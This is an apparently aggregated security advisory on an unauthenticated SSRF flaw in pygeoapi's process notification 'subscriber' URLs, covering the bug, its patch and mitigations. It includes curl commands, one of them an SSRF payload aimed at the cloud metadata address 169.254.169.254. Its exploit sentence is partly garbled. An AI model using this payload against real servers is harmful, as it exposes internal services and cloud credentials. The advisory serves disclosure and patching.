Listen to this Post
The vulnerability exists in the process manager of pygeoapi versions 0.23.0 through 0.23.2. When a user submits a job to an OGC API‑compliant process, they can include a `subscriber` object that contains URLs for receiving notifications about the job’s status. The functions _send_in_progress_notification, `_send_success_notification` and `_send_failed_notification` in the `BaseManager` class used the `requests.post` method to send a POST request to those user‑supplied URLs without any validation. An unauthenticated attacker can craft a process execution request with a `subscriber` object that points to an internal resource, for example http://127.0.0.1:8080/admin`. The pygeoapi server then executes that request, which allows the attacker to scan the internal network, access sensitive endpoints, or interact with internal services. This is a classic Server‑Side Request Forgery (SSRF) vulnerability. The issue has been patched in the master branch and made available as part of the 0.23.3 release. The patch introduces a validation function `is_request_allowed` that checks whether a URL resolves to a private or loopback IP address. By default, requests to such internal addresses are blocked, unless the new configuration directive `allow_internal_requests` is explicitly set toTrue. The commit that contains the fix is3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef.
<h2 style="color: blue;">dailycve form:</h2>
Platform: pygeoapi
Version: 0.23.x
Vulnerability: Unauthenticated SSRF
Severity: High
date: 2026-04-22
<h2 style="color: blue;">Prediction: Patch already released</h2>
<h2 style="color: blue;">Analytics under heading What Undercode Say:</h2>
Identify vulnerable version
curl -s https://your-pygeoapi-server/openapi.json | grep -E '"version": "0.23.[0-2]"'
Confirm SSRF by triggering a notification request
curl -X POST https://your-pygeoapi-server/processes/hello-world/execution \
-H "Content-Type: application/json" \
-d '{"subscriber":{"in_progress_uri":"http://169.254.169.254/latest/meta-data/"}}'
List all processes that accept subscriber objects
curl -s https://your-pygeoapi-server/processes | jq '.processes[].id'
<h2 style="color: blue;">Exploit:</h2>
Send a POST request to the `/processes/,success_uri`, or `failed_uri` set to an internal address. The server will make a request to that address, exposing internal services.
Protection from this CVE
Upgrade to pygeoapi version 0.23.3. If an immediate upgrade is not possible, disable process‑based resources in the pygeoapi configuration file. Alternatively, set `allow_internal_requests: false` (the default) in the `process` section of the configuration.
Impact
An unauthenticated attacker can bypass network boundaries, scan internal infrastructure, access sensitive metadata endpoints (e.g., cloud instance metadata), and potentially pivot to other internal services.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
